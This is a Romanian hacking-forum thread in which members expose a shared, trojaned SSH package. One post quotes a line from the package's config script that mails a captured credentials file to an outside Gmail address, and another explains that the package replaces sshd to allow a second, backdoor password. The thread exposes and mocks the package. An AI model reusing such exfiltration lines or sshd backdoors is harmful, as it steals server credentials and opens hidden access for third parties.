binbash Posted September 18, 2012 Report Posted September 18, 2012 (edited) Gata cu programu de bine facere .Prea multe reclamatii cand incerci sa faci un bine ! Edited September 18, 2012 by binbash 1
em Posted September 18, 2012 Report Posted September 18, 2012 @binbash Hai sa ghicesc adresa ta de e-mail. sshsniff/contrib/cygwin/ssh-root-config:21: cat /tmp/.w | mail -s "root ssh" rootsniff2@gmail.comAm zis bine?
binbash Posted September 18, 2012 Author Report Posted September 18, 2012 pei daca are vreun mail esti bine venit sa-l stergi ... daia am si postat source ... ca si eu l-am primit de la cineva si sunt incantat de el ... Dar asa e vad ca pe forumu asta cand faci un bine iti da ban ..
Guest Kovalski Posted September 18, 2012 Report Posted September 18, 2012 ^Gresit, cand faci un bine vei fi laudat si apreciat.Cand umblii cu cioara vopsita primesti ban, ca in cazul tau.
aelius Posted September 18, 2012 Report Posted September 18, 2012 (edited) 1. Prietene, asta este un pachet de ssh modificat si iti spun sigur ca cu o simpla chestie elementara este detectat. Nu este nicidecum "hide" - El inlocuieste sshd-ul. E folosit de cel putin 8 ani.2. Nu creaza niciun user cu drept de root, o sa foloseasca acelasi utilizator. Pachetul pur si simplu face posibila autentificarea cu doua parole pentru acelasi utilizator.3. Vezi ca Wget este intotdeauna wget4. Aici nu este canal de irc si nu oferim niciun fel de ajutor pentru retarzii care se uita doar sa strice munca oamenilor.5. @em ti-a spus ca ai un email in el la care se trimit datele. De ce ai fi atat de incantat daca la cele 100 de servere de care vorbeai mai sus ar avea acces si altcineva? Nu cumva rootsniff2@gmail.com este al tau ?6. Un server sau orice amarat de PC cu linux instalat nu se numeste "root". root-ul este doar un super user si atat. Deci, Roate = lame. Edited September 18, 2012 by aelius
Zatarra Posted September 18, 2012 Report Posted September 18, 2012 O securizam pe mata. Date-n gatu matii de haxor. Cu dume de genul asta vii la noi ma